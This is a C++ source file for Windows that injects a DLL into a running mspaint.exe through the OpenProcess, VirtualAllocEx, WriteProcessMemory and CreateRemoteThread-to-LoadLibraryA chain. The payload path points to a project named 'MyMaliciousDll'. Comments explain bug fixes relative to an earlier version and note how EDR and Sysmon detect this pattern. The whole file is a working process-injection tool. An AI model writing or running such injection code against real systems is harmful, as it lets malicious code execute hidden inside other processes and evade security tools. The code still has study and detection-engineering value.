#include <iostream>
#include <windows.h>
#include "Processthreadsapi.h"
#include "Libloaderapi.h"
#include <tlhelp32.h>
#include "winternl.h"
using namespace std;
/// Write `msg` to stderr followed by a newline and a flush, then return the
/// process exit status 1, so call sites can be written as `return err("...")`.
int err(const char* msg) {
    std::cerr << msg << '\n';
    std::cerr.flush();
    return 1;
}
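/// Return the PID of the first running process whose image name is exactly
/// `process_name` (case-sensitive comparison, as in the original), or 0 when
/// no process matches or the process snapshot cannot be taken.
///
/// Uses a toolhelp process snapshot; the snapshot handle is released on every
/// exit path by a small RAII guard, so nothing leaks on early return.
int find_process(const wchar_t* process_name) {
    // CreateToolhelp32Snapshot signals failure with INVALID_HANDLE_VALUE, not
    // NULL; the original passed that value on to Process32First/CloseHandle.
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE) {
        return 0;
    }
    struct SnapshotGuard {
        HANDLE h;
        ~SnapshotGuard() { CloseHandle(h); }
    } guard{snapshot};

    // Explicit W variants so the wide-string compare below does not depend on
    // the build having UNICODE defined.
    PROCESSENTRY32W entry{};
    entry.dwSize = sizeof(entry);

    // Process32FirstW already yields a real entry; the original compared only
    // entries returned by Process32Next and silently skipped the first one.
    for (BOOL ok = Process32FirstW(snapshot, &entry); ok; ok = Process32NextW(snapshot, &entry)) {
        if (wcscmp(entry.szExeFile, process_name) == 0) {
            return static_cast<int>(entry.th32ProcessID);
        }
    }
    return 0;
}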
#define INJECTION_TARGET L"mspaint.exe"
#define DLL_TO_INJECT "C:\\Users\\Christophe\\source\\repos\\MyMaliciousDll\\x64\\Release\\MYMALICIOUSDLL.DLL"
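/// Entry point: injects DLL_TO_INJECT into the first running process named
/// INJECTION_TARGET via the classic LoadLibraryA + CreateRemoteThread
/// technique. Returns 0 on success, 1 on any failure (reason on stderr).
///
/// Detection note: this API chain — OpenProcess on a foreign process with
/// PROCESS_VM_WRITE | PROCESS_CREATE_THREAD, VirtualAllocEx, WriteProcessMemory,
/// then CreateRemoteThread whose start address resolves to LoadLibraryA — is
/// the textbook pattern that EDR products and Sysmon event 8
/// (CreateRemoteThread) telemetry are built to surface.
///
/// Requirements: the caller needs sufficient rights over the target process,
/// DLL_TO_INJECT must be an absolute path the target can read, and the DLL's
/// bitness must match the target's (64-bit here).
int main()
{
    cout << "Getting handle on target process" << endl;

    // Step 1: locate the target. find_process() returns 0 when nothing
    // matched; the original handed that 0 straight to OpenProcess.
    const int targetPid = find_process(INJECTION_TARGET);
    if (targetPid == 0)
        return err("Target process not found");

    const DWORD desiredAccess = PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION
                              | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ;
    // The handle is never passed to a child process, so it need not be
    // inheritable (the original requested bInheritHandle = TRUE).
    HANDLE hTargetProcess = OpenProcess(desiredAccess, FALSE, static_cast<DWORD>(targetPid));
    if (hTargetProcess == NULL)
        return err("Unable to get a handle on target process");

    // Step 2: write the DLL path into the target's address space.
    // NOTE: the DLL must be 64-bit.
    // sizeof() on the literal includes the terminating NUL; the original
    // allocated and wrote strlen() bytes and only had a terminator because a
    // freshly committed page happens to be zero-filled.
    const SIZE_T pathBytes = sizeof(DLL_TO_INJECT);
    LPVOID targetDataPage = VirtualAllocEx(hTargetProcess, NULL, pathBytes,
                                           MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (targetDataPage == NULL) {
        // The original logged this failure but did not return, and went on to
        // call WriteProcessMemory with a NULL destination.
        CloseHandle(hTargetProcess);
        return err("Unable to allocate memory in target process");
    }

    // Step 2.2: copy the path (including its NUL) into the allocated region.
    if (!WriteProcessMemory(hTargetProcess, targetDataPage, DLL_TO_INJECT, pathBytes, NULL)) {
        CloseHandle(hTargetProcess);
        return err("Unable to write DLL path to target process memory");
    }

    // Step 3: resolve LoadLibraryA in *this* process. The address is only
    // meaningful inside the target because kernel32.dll is mapped at the same
    // base address in every process of a boot session.
    cout << "Retrieving LoadLibraryA address" << endl;
    HMODULE hModule = GetModuleHandleA("kernel32.dll");
    FARPROC load_library_addr = hModule ? GetProcAddress(hModule, "LoadLibraryA") : NULL;
    if (load_library_addr == NULL) {
        CloseHandle(hTargetProcess);
        return err("Unable to resolve LoadLibraryA");
    }
    // Streaming a function pointer directly selects operator<<(bool) and
    // prints "1"; cast to void* so the actual address is printed.
    cout << "LoadLibraryA @ " << reinterpret_cast<void*>(load_library_addr) << endl;

    // Step 4: start a thread in the target whose entry point is LoadLibraryA
    // and whose single argument is the remote copy of the DLL path.
    DWORD threadId = 0;
    HANDLE hThread = CreateRemoteThread(
        hTargetProcess,
        NULL,
        0,
        reinterpret_cast<LPTHREAD_START_ROUTINE>(load_library_addr),
        targetDataPage,
        0,
        &threadId
    );
    if (hThread == NULL) {
        cerr << "Unable to create remote thread: error " << GetLastError() << endl;
        CloseHandle(hTargetProcess);
        return 1;
    }

    // Step 5: release our handles; the remote thread continues in the target
    // regardless of whether this process keeps them open.
    CloseHandle(hThread);
    CloseHandle(hTargetProcess);
    return 0;
}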